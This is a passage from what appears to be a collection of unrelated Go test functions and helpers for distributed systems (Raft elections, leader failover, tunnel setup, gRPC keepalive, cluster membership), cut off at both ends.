AF_INET6\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"[::1]:6000\",\n\t\t\t\tPeer: \"[::1]:5000\",\n\t\t\t\tVersion: ProtocolVersion3,\n\t\t\t\tTunnelID: 6,\n\t\t\t\tPeerTunnelID: 1006,\n\t\t\t\tEncap: EncapTypeIP,\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, c := range cases {\n\t\tt.Run(c.name, func(t *testing.T) {\n\t\t\tctx, err := NewContext(\n\t\t\t\tLinuxNetlinkDataPlane,\n\t\t\t\tlevel.NewFilter(log.NewLogfmtLogger(os.Stderr),\n\t\t\t\t\tlevel.AllowDebug(), level.AllowInfo()))\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"NewContext(): %v\", err)\n\t\t\t}\n\t\t\tdefer ctx.Close()\n\n\t\t\t_, err = ctx.NewQuiescentTunnel(\"t1\", &c.cfg)\n\t\t\tif c.expectFail {\n\t\t\t\tif err == nil {\n\t\t\t\t\tt.Fatalf(\"Expected NewQuiescentTunnel(%v) to fail\", c.cfg)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Fatalf(\"NewQuiescentTunnel(%v): %v\", c.cfg, err)\n\t\t\t\t}\n\n\t\t\t\terr = checkTunnel(&c.cfg)\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Errorf(\"NewQuiescentTunnel(%v): failed to validate: %v\", c.cfg, err)\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\t}\n}", "func TestMetasyncMembership(t *testing.T) {\n\t{\n\t\t// pending server dropped without sync\n\t\tprimary := newPrimary()\n\t\tsyncer := testSyncer(primary)\n\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func(wg *sync.WaitGroup) {\n\t\t\tdefer wg.Done()\n\t\t\tsyncer.Run()\n\t\t}(&wg)\n\n\t\tvar cnt atomic.Int32\n\t\ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tcnt.Add(1)\n\t\t\thttp.Error(w, \"i don't know how to deal with you\", http.StatusNotAcceptable)\n\t\t}))\n\n\t\tdefer s.Close()\n\n\t\tid := \"t\"\n\t\taddrInfo := serverTCPAddr(s.URL)\n\t\tclone := primary.owner.smap.get().clone()\n\t\tclone.addTarget(meta.NewSnode(id, apc.Target, addrInfo, addrInfo, addrInfo))\n\t\tprimary.owner.smap.put(clone)\n\t\tmsg := primary.newAmsgStr(\"\", nil)\n\t\twg1 := syncer.sync(revsPair{clone, msg})\n\t\twg1.Wait()\n\t\ttime.Sleep(time.Millisecond * 300)\n\n\t\tclone = primary.owner.smap.get().clone()\n\t\tclone.delTarget(id)\n\t\tprimary.owner.smap.put(clone)\n\n\t\ttime.Sleep(time.Millisecond * 300)\n\t\tsavedCnt := cnt.Load()\n\t\ttime.Sleep(time.Millisecond * 300)\n\t\tif cnt.Load() != savedCnt {\n\t\t\tt.Fatal(\"Sync call didn't stop after traget is deleted\")\n\t\t}\n\n\t\tsyncer.Stop(nil)\n\t\twg.Wait()\n\t}\n\n\tprimary := newPrimary()\n\tsyncer := testSyncer(primary)\n\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\tgo func(wg *sync.WaitGroup) {\n\t\tdefer wg.Done()\n\t\tsyncer.Run()\n\t}(&wg)\n\n\tch := make(chan struct{}, 10)\n\tf := func(w http.ResponseWriter, r *http.Request) {\n\t\tch <- struct{}{}\n\t}\n\n\t{\n\t\t// sync before smap sync (no previous sync saved in metasyncer)\n\t\ts1 := httptest.NewServer(http.HandlerFunc(f))\n\t\tdefer s1.Close()\n\n\t\tid := \"t1111\"\n\t\taddrInfo := serverTCPAddr(s1.URL)\n\t\tdi := meta.NewSnode(id, apc.Target, addrInfo, addrInfo, addrInfo)\n\t\tclone := primary.owner.smap.get().clone()\n\t\tclone.addTarget(di)\n\t\tprimary.owner.smap.put(clone)\n\t\tbmd := primary.owner.bmd.get()\n\t\tmsg := primary.newAmsgStr(\"\", bmd)\n\t\twg := syncer.sync(revsPair{bmd, msg})\n\t\twg.Wait()\n\t\t<-ch\n\n\t\t// sync smap so metasyncer has a smap\n\t\twg = syncer.sync(revsPair{clone, msg})\n\t\twg.Wait()\n\t\t<-ch\n\t}\n\n\t{\n\t\t// add a new target but new smap is not synced\n\t\t// metasyncer picks up the new target directly from primary's smap\n\t\t// and metasyncer will also add the new target to pending to sync all previously synced data\n\t\t// that's why the extra channel read\n\t\ts2 := httptest.NewServer(http.HandlerFunc(f))\n\t\tdefer s2.Close()\n\n\t\tid := \"t22222\"\n\t\taddrInfo := serverTCPAddr(s2.URL)\n\t\tdi := meta.NewSnode(id, apc.Target, addrInfo, addrInfo, addrInfo)\n\t\tclone := primary.owner.smap.get().clone()\n\t\tclone.addTarget(di)\n\t\tprimary.owner.smap.put(clone)\n\n\t\tbmd := primary.owner.bmd.get()\n\t\tmsg := primary.newAmsgStr(\"\", bmd)\n\t\twg := syncer.sync(revsPair{bmd, msg})\n\t\twg.Wait()\n\t\t<-ch // target 1\n\t\t<-ch // target 2\n\t\tif len(ch) != 0 {\n\t\t\tt.Fatal(\"Too many sync calls received\")\n\t\t}\n\n\t\tsyncer.Stop(nil)\n\t\twg.Wait()\n\t}\n}", "func (this *PoolTestSuite) TestNoInstanceOverlap() {\n\tmaxTotal := 5\n\tnumGoroutines := 100\n\tdelay := 1\n\titerations := 1000\n\tthis.pool.Config.MaxTotal = maxTotal\n\tthis.pool.Config.MaxIdle = maxTotal\n\tthis.pool.Config.TestOnBorrow = true\n\tthis.pool.Config.BlockWhenExhausted = true\n\tthis.pool.Config.MaxWaitMillis = int64(-1)\n\trunTestGoroutines(this.T(), numGoroutines, iterations, delay, this.pool)\n\tthis.Equal(0, this.pool.GetDestroyedByBorrowValidationCount())\n}", "func Test_Unstable_RGIT_TestConsistentWhenRandomNodeStopMultiTimes(t *testing.T) {\n\n\tfullMessages := make([]string, 0)\n\tstopTimes := 30\n\n\ttestInitAllDataFolder(\"TestRGIT_TestConsistentWhenLeaderChangeMultiTimes\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 100)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\tfullMessages = append(fullMessages, proposeMessages...)\n\n\tfor i := 0; i < stopTimes; i++ {\n\t\tstopNodeIndex := rand.Intn(3)\n\t\tmemberID := raftGroupNodes[stopNodeIndex].Membership.GetSelfMemberID()\n\t\tif raftGroupNodes[stopNodeIndex].IsLeader() {\n\t\t\tfmt.Println(\"stop leader \", memberID)\n\t\t} else {\n\t\t\tfmt.Println(\"stop node \", memberID)\n\t\t}\n\t\traftGroupNodes[stopNodeIndex].Stop()\n\n\t\t// append again\n\t\tproposeMessages = testCreateMessages(t, 100)\n\t\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t\tfullMessages = append(fullMessages, proposeMessages...)\n\n\t\tfmt.Println(\"start node \", memberID)\n\t\traftGroupNodes[stopNodeIndex].Start()\n\t}\n\n\t// 5s is enough to process raft group\n\ttime.Sleep(5 * time.Second)\n\ttestDoCheckData(t, fullMessages, raftGroupNodes, 1024*100, false)\n}", "func TestChangeConfig_removeVoters(t *testing.T) {\n\t// launch 5 node cluster\n\tc, ldr, flrs := launchCluster(t, 5)\n\tdefer c.shutdown()\n\n\t// wait for commit ready\n\tc.waitCommitReady(ldr)\n\n\telectionAborted0 := c.registerFor(eventElectionAborted, flrs[0])\n\tdefer c.unregister(electionAborted0)\n\telectionAborted1 := c.registerFor(eventElectionAborted, flrs[1])\n\tdefer c.unregister(electionAborted1)\n\n\t// submit ChangeConfig with two voters removed\n\tconfig := c.info(ldr).Configs.Latest\n\tif err := config.SetAction(flrs[0].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := config.SetAction(flrs[1].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc.ensure(waitTask(ldr, ChangeConfig(config), c.longTimeout))\n\n\t// wait for stable config\n\tc.ensure(waitTask(ldr, WaitForStableConfig(), c.longTimeout))\n\n\t// ensure that removed nodes aborted election\n\te, err := electionAborted0.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\t_, err = electionAborted1.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\n\t// shutdown the removed nodes\n\tc.shutdown(flrs[0], flrs[1])\n\n\t// shutdown the leader\n\tc.shutdown(ldr)\n\n\t// wait for leader among the remaining two nodes\n\tc.waitForLeader(flrs[2], flrs[3])\n}", "func (e *EvtFailureDetector) timeout() {\n\t// TODO(student): Implement timeout procedure\n\t// Based on Algorithm 2.7: Increasing Timeout at page 55\n\t//if alive ∩ suspected != ∅ then:\n\tif len(e.intersection(e.alive, e.suspected)) > 0 {\n\t\t//delay := delay +Δ;\n\t\te.delay = e.delay + e.delta\n\t}\n\t// forall p ∈ Π do\n\tfor _, nodeID := range e.nodeIDs {\n\t\t// if (p !∈ alive) ∧ (p !∈ suspected) then\n\t\tif e.inAlive(nodeID) == false && e.inSuspected(nodeID) == false {\n\t\t\t//suspected := suspected ∪{p};\n\t\t\te.suspected[nodeID] = true\n\t\t\t//trigger P, Suspect | p;\n\t\t\te.sr.Suspect(nodeID)\n\t\t\t//else if (p ∈ alive) ∧ (p ∈ suspected) then\n\t\t} else if e.inAlive(nodeID) && e.inSuspected(nodeID) {\n\t\t\t//suspected := suspected \\{p};\n\t\t\tdelete(e.suspected, nodeID)\n\t\t\t//e.suspected[nodeID] = false\n\t\t\t//trigger P, Restore | p;\n\t\t\te.sr.Restore(nodeID)\n\t\t}\n\t\t//trigger pl, Send | p, [HEARTBEATREQUEST];\n\t\thbReq := Heartbeat{From: e.id, To: nodeID, Request: true}\n\t\te.hbSend <- hbReq\n\t}\n\t//alive := ∅;\n\temptyAlive := make(map[int]bool)\n\te.alive = emptyAlive\n\t//starttimer(delay);\n\te.timeoutSignal.Stop()\n\te.timeoutSignal = time.NewTicker(e.delay)\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func (this *HeartBeat) timeout() {\n\tpeers := this.net.GetNeighbors()\n\tvar periodTime uint = config.DEFAULT_GEN_BLOCK_TIME / common.UPDATE_RATE_PER_BLOCK\n\tfor _, p := range peers {\n\t\tt := p.GetContactTime()\n\t\tif t.Before(time.Now().Add(-1 * time.Second *\n\t\t\ttime.Duration(periodTime) * common.KEEPALIVE_TIMEOUT)) {\n\t\t\tlog4.Warn(\"[p2p]keep alive timeout!!!lost remote peer %d - %s from %s\", p.GetID(), p.Link.GetAddr(), t.String())\n\t\t\tp.Close()\n\t\t}\n\t}\n}", "func TestV3ElectionObserve(t *testing.T) {\n\tintegration.BeforeTest(t)\n\tclus := integration.NewCluster(t, &integration.ClusterConfig{Size: 1})\n\tdefer clus.Terminate(t)\n\n\tlc := integration.ToGRPC(clus.Client(0)).Election\n\n\t// observe leadership events\n\tobservec := make(chan struct{}, 1)\n\tgo func() {\n\t\tdefer close(observec)\n\t\ts, err := lc.Observe(context.Background(), &epb.LeaderRequest{Name: []byte(\"foo\")})\n\t\tobservec <- struct{}{}\n\t\tif err != nil {\n\t\t\tt.Error(err)\n\t\t}\n\t\tfor i := 0; i < 10; i++ {\n\t\t\tresp, rerr := s.Recv()\n\t\t\tif rerr != nil {\n\t\t\t\tt.Error(rerr)\n\t\t\t}\n\t\t\trespV := 0\n\t\t\tfmt.Sscanf(string(resp.Kv.Value), \"%d\", &respV)\n\t\t\t// leader transitions should not go backwards\n\t\t\tif respV < i {\n\t\t\t\tt.Errorf(`got observe value %q, expected >= \"%d\"`, string(resp.Kv.Value), i)\n\t\t\t}\n\t\t\ti = respV\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe stream took too long to start\")\n\t}\n\n\tlease1, err1 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\tif err1 != nil {\n\t\tt.Fatal(err1)\n\t}\n\tc1, cerr1 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease1.ID, Value: []byte(\"0\")})\n\tif cerr1 != nil {\n\t\tt.Fatal(cerr1)\n\t}\n\n\t// overlap other leader so it waits on resign\n\tleader2c := make(chan struct{})\n\tgo func() {\n\t\tdefer close(leader2c)\n\n\t\tlease2, err2 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\t\tif err2 != nil {\n\t\t\tt.Error(err2)\n\t\t}\n\t\tc2, cerr2 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease2.ID, Value: []byte(\"5\")})\n\t\tif cerr2 != nil {\n\t\t\tt.Error(cerr2)\n\t\t}\n\t\tfor i := 6; i < 10; i++ {\n\t\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\t\treq := &epb.ProclaimRequest{Leader: c2.Leader, Value: v}\n\t\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\t\tt.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n\n\tfor i := 1; i < 5; i++ {\n\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\treq := &epb.ProclaimRequest{Leader: c1.Leader, Value: v}\n\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\t// start second leader\n\tlc.Resign(context.TODO(), &epb.ResignRequest{Leader: c1.Leader})\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe did not observe all events in time\")\n\t}\n\n\t<-leader2c\n}", "func TestCannotTransferLeaseToVoterOutgoing(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tknobs, ltk := makeReplicationTestKnobs()\n\t// Add a testing knob to allow us to block the change replicas command\n\t// while it is being proposed. When we detect that the change replicas\n\t// command to move n3 to VOTER_OUTGOING has been evaluated, we'll send\n\t// the request to transfer the lease to n3. The hope is that it will\n\t// get past the sanity above latch acquisition prior to change replicas\n\t// command committing.\n\tvar scratchRangeID atomic.Value\n\tscratchRangeID.Store(roachpb.RangeID(0))\n\tchangeReplicasChan := make(chan chan struct{}, 1)\n\tshouldBlock := func(args kvserverbase.ProposalFilterArgs) bool {\n\t\t// Block if a ChangeReplicas command is removing a node from our range.\n\t\treturn args.Req.RangeID == scratchRangeID.Load().(roachpb.RangeID) &&\n\t\t\targs.Cmd.ReplicatedEvalResult.ChangeReplicas != nil &&\n\t\t\tlen(args.Cmd.ReplicatedEvalResult.ChangeReplicas.Removed()) > 0\n\t}\n\tblockIfShould := func(args kvserverbase.ProposalFilterArgs) {\n\t\tif shouldBlock(args) {\n\t\t\tch := make(chan struct{})\n\t\t\tchangeReplicasChan <- ch\n\t\t\t<-ch\n\t\t}\n\t}\n\tknobs.Store.(*kvserver.StoreTestingKnobs).TestingProposalFilter = func(args kvserverbase.ProposalFilterArgs) *roachpb.Error {\n\t\tblockIfShould(args)\n\t\treturn nil\n\t}\n\ttc := testcluster.StartTestCluster(t, 4, base.TestClusterArgs{\n\t\tServerArgs: base.TestServerArgs{Knobs: knobs},\n\t\tReplicationMode: base.ReplicationManual,\n\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tscratchStartKey := tc.ScratchRange(t)\n\tdesc := tc.AddVotersOrFatal(t, scratchStartKey, tc.Targets(1, 2)...)\n\tscratchRangeID.Store(desc.RangeID)\n\t// Make sure n1 has the lease to start with.\n\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\tscratchStartKey, tc.Target(0).StoreID)\n\trequire.NoError(t, err)\n\n\t// The test proceeds as follows:\n\t//\n\t// - Send an AdminChangeReplicasRequest to remove n3 and add n4\n\t// - Block the step that moves n3 to VOTER_OUTGOING on changeReplicasChan\n\t// - Send an AdminLeaseTransfer to make n3 the leaseholder\n\t// - Try really hard to make sure that the lease transfer at least gets to\n\t// latch acquisition before unblocking the ChangeReplicas.\n\t// - Unblock the ChangeReplicas.\n\t// - Make sure the lease transfer fails.\n\n\tltk.withStopAfterJointConfig(func() {\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\t_, err = tc.Server(0).DB().AdminChangeReplicas(ctx,\n\t\t\t\tscratchStartKey, desc, []roachpb.ReplicationChange{\n\t\t\t\t\t{ChangeType: roachpb.REMOVE_VOTER, Target: tc.Target(2)},\n\t\t\t\t\t{ChangeType: roachpb.ADD_VOTER, Target: tc.Target(3)},\n\t\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t}()\n\t\tch := <-changeReplicasChan\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\t\t\tscratchStartKey, tc.Target(2).StoreID)\n\t\t\trequire.Error(t, err)\n\t\t\trequire.Regexp(t,\n\t\t\t\t// The error generated during evaluation.\n\t\t\t\t\"replica cannot hold lease|\"+\n\t\t\t\t\t// If the lease transfer request has not yet made it to the latching\n\t\t\t\t\t// phase by the time we close(ch) below, we can receive the following\n\t\t\t\t\t// error due to the sanity checking which happens in\n\t\t\t\t\t// AdminTransferLease before attempting to evaluate the lease\n\t\t\t\t\t// transfer.\n\t\t\t\t\t// We have a sleep loop below to try to encourage the lease transfer\n\t\t\t\t\t// to make it past that sanity check prior to letting the change\n\t\t\t\t\t// of replicas proceed.\n\t\t\t\t\t\"cannot transfer lease to replica of type VOTER_DEMOTING_LEARNER\", err.Error())\n\t\t}()\n\t\t// Try really hard to make sure that our request makes it past the\n\t\t// sanity check error to the evaluation error.\n\t\tfor i := 0; i < 100; i++ {\n\t\t\truntime.Gosched()\n\t\t\ttime.Sleep(time.Microsecond)\n\t\t}\n\t\tclose(ch)\n\t\twg.Wait()\n\t})\n\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestTCPProbeTimeout(t *testing.T) {\n\tprobeExpectTimeout(t, 49)\n\tprobeExpectTimeout(t, 50)\n\tprobeExpectTimeout(t, 51)\n}", "func TestWithRoundRobin(t *testing.T) {\n\tt.Skip()\n\n\tctx := context.Background()\n\tctx, cancel := context.WithTimeout(ctx, testtime.Second)\n\tdefer cancel()\n\n\tpermanent, permanentAddr := spec.NewServer(t, \"\")\n\tdefer permanent.Stop()\n\n\ttemporary, temporaryAddr := spec.NewServer(t, \"\")\n\tdefer temporary.Stop()\n\n\tl, err := net.Listen(\"tcp\", \"127.0.0.1:0\")\n\trequire.NoError(t, err, \"listen for bogus server\")\n\tinvalidAddr := l.Addr().String()\n\tdefer l.Close()\n\n\t// Construct a client with a bank of peers. We will keep one running all\n\t// the time. We'll shut one down temporarily. One will be invalid.\n\t// The round robin peer list should only choose peers that have\n\t// successfully connected.\n\tclient, c := spec.NewClient(t, []string{\n\t\tpermanentAddr,\n\t\ttemporaryAddr,\n\t\tinvalidAddr,\n\t})\n\tdefer client.Stop()\n\n\t// All requests should succeed. The invalid peer never enters the rotation.\n\tintegrationtest.Blast(ctx, t, c)\n\n\t// Shut down one task in the peer list.\n\ttemporary.Stop()\n\t// One of these requests may fail since one of the peers has gone down but\n\t// the TChannel transport will not know until a request is attempted.\n\tintegrationtest.Call(ctx, c)\n\tintegrationtest.Call(ctx, c)\n\t// All subsequent should succeed since the peer should be removed on\n\t// connection fail.\n\tintegrationtest.Blast(ctx, t, c)\n\n\t// Restore the server on the temporary port.\n\trestored, _ := spec.NewServer(t, temporaryAddr)\n\tdefer restored.Stop()\n\tintegrationtest.Blast(ctx, t, c)\n}", "func TestConnectionStateConnectingToFailed(t *testing.T) {\n\treport := test.CheckRoutines(t)\n\tdefer report()\n\n\tlim := test.TimeOut(time.Second * 5)\n\tdefer lim.Stop()\n\n\toneSecond := time.Second\n\tKeepaliveInterval := time.Duration(0)\n\n\tcfg := &AgentConfig{\n\t\tDisconnectedTimeout: &oneSecond,\n\t\tFailedTimeout: &oneSecond,\n\t\tKeepaliveInterval: &KeepaliveInterval,\n\t}\n\n\taAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tbAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tvar isFailed sync.WaitGroup\n\tvar isChecking sync.WaitGroup\n\n\tisFailed.Add(2)\n\tisChecking.Add(2)\n\n\tconnectionStateCheck := func(c ConnectionState) {\n\t\tswitch c {\n\t\tcase ConnectionStateFailed:\n\t\t\tisFailed.Done()\n\t\tcase ConnectionStateChecking:\n\t\t\tisChecking.Done()\n\t\tcase ConnectionStateCompleted:\n\t\t\tt.Errorf(\"Unexpected ConnectionState: %v\", c)\n\t\tdefault:\n\t\t}\n\t}\n\n\tassert.NoError(t, aAgent.OnConnectionStateChange(connectionStateCheck))\n\tassert.NoError(t, bAgent.OnConnectionStateChange(connectionStateCheck))\n\n\tgo func() {\n\t\t_, err := aAgent.Accept(context.TODO(), \"InvalidFrag\", \"InvalidPwd\")\n\t\tassert.Error(t, err)\n\t}()\n\n\tgo func() {\n\t\t_, err := bAgent.Dial(context.TODO(), \"InvalidFrag\", \"InvalidPwd\")\n\t\tassert.Error(t, err)\n\t}()\n\n\tisChecking.Wait()\n\tisFailed.Wait()\n\n\tassert.NoError(t, aAgent.Close())\n\tassert.NoError(t, bAgent.Close())\n}", "func TestOnlineElection(t *testing.T) {\n\tvar cases = []struct {\n\t\tpersons []int\n\t\ttimes []int\n\t\tq []int\n\t\ta []int\n\t}{\n\t\t//{\n\t\t//\tpersons: []int{0, 1, 1, 0, 0, 1, 0},\n\t\t//\ttimes: []int{0, 5, 10, 15, 20, 25, 30},\n\t\t//\tq: []int{3, 12, 25, 15, 24, 8},\n\t\t//\ta: []int{0, 1, 1, 0, 0, 1},\n\t\t//},\n\t\t{\n\t\t\tpersons: []int{0, 1, 0, 1, 1},\n\t\t\ttimes: []int{24, 29, 31, 76, 81},\n\t\t\tq: []int{28, 24, 29, 77, 30, 25, 76, 75, 81, 80},\n\t\t\ta: []int{0, 0, 1, 1, 1, 0, 1, 0, 1, 1},\n\t\t},\n\t}\n\tfor _, c := range cases {\n\t\tvote := Constructor(c.persons, c.times)\n\t\tfor i := 0; i < len(c.q); i++ {\n\t\t\tif vote.Q(c.q[i]) != c.a[i] {\n\t\t\t\tt.Fail()\n\t\t\t}\n\t\t}\n\t}\n}", "func (g *groupFailover) Timeout() time.Duration {\n\treturn g.timeout\n}", "func (rf *Raft) heartbeatTimeoutCheck() {\n\t// get heartbeat check start time\n\tlastHeartbeatCheck := time.Now()\n\ti := 0\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.electionTimeout > 0 && rf.state == Follower {\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastHeartbeatCheck))\n\t\t\tlastHeartbeatCheck = currentTime\n\t\t\tif i%10 == 0 { // decrease log density\n\t\t\t\trf.Log(LogDebug, \"timeout remaining:\", rf.electionTimeout)\n\t\t\t}\n\t\t} else if rf.state == Follower {\n\t\t\t// election needs to occur\n\t\t\t// quit this function and run the election\n\t\t\trf.Log(LogInfo, \"timed out as follower, running election.\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ti++\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func TestMaxConnectionAge(t *testing.T) {\n\tt.Parallel()\n\tconst maxAge = 3 * time.Second\n\tsrv := &test.GrpcTestingServer{\n\t\tStreamingFunc: func(server test.Testing_StreamingRequestResponseServer) error {\n\t\t\t//start := time.Now()\n\t\t\t//ctx := server.Context()\n\t\t\t//<-ctx.Done()\n\t\t\t//t.Logf(\"ctx.Err() = %v after %s\", ctx.Err(), time.Since(start))\n\t\t\t//return ctx.Err()\n\t\t\ttime.Sleep(maxAge + maxAge*2/10) // +20%\n\t\t\treturn nil\n\t\t},\n\t}\n\ttestClient := func(t *testing.T, client test.TestingClient) {\n\t\tstart := time.Now()\n\t\tresp, err := client.StreamingRequestResponse(context.Background())\n\t\trequire.NoError(t, err)\n\t\t_, err = resp.Recv()\n\t\trequire.Equal(t, io.EOF, err, \"%s. Elapsed: %s\", err, time.Since(start))\n\t}\n\tkp := keepalive.ServerParameters{\n\t\tMaxConnectionAge: maxAge,\n\t\tMaxConnectionAgeGrace: maxAge,\n\t}\n\tsh := NewJoinStatHandlers()\n\tt.Run(\"gRPC\", func(t *testing.T) {\n\t\ttestKeepalive(t, false, kp, sh, srv, testClient)\n\t})\n\tt.Run(\"WebSocket\", func(t *testing.T) {\n\t\ttestKeepalive(t, true, kp, sh, srv, testClient)\n\t})\n}", "func testTimeoutReplacement(ctx context.Context, t *testing.T, w *Wallet) {\n\ttimeChan1 := make(chan time.Time)\n\ttimeChan2 := make(chan time.Time)\n\terr := w.Unlock(ctx, testPrivPass, timeChan1)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock 